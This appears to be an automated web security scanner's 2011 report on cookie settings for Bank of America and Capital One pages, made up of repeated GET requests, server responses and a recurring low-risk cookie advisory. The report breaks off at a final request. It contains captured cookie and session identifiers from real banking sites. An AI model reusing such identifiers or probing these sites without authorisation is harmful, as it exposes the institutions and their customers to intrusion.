GET /studentbanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:46 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=studentchecking&destination=nba/studentbanking/index.cfm?template=stb_overview&context= Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /vehicle_and_personal_loans/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:58 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/vehicle_and_personal_loans/index.cfm?adlink=&context=&override_debug_mode=DEBUG&type= Connection: close Set-Cookie: BIGipServerngen-www.80=3869619883.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
// Configurable throttle values. var throttle_percent_ngen = 100; var throttle_percent_olb = 100; var throttle_counter_active = false; var throttle_counter_percent = 0;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/auto-loan-calculator.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:26 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 33970
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Auto Payment and Other Auto Calculators - Capital One</title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/lp/auto-loans-pict.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 12533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Save time and m ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/refinance/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24471
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bank/commercial/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:20 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 41880
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Comme ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C8_01_T_HLMAINFOCCB HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:22 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 17136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Home ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /banking/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:12:01 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Location: http://www.capitalone.com/banking/personal/? Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /capitaloneplace/disclosures.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:43 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:43 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22852
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Im ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 35950
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /checking-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:02 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:01 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:28 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 28007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Capital O ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus/faq.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:32 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:32 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One Frequ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus/olbsupport.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 25849
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Onlin ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creditcards/balance_transfer_hp.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
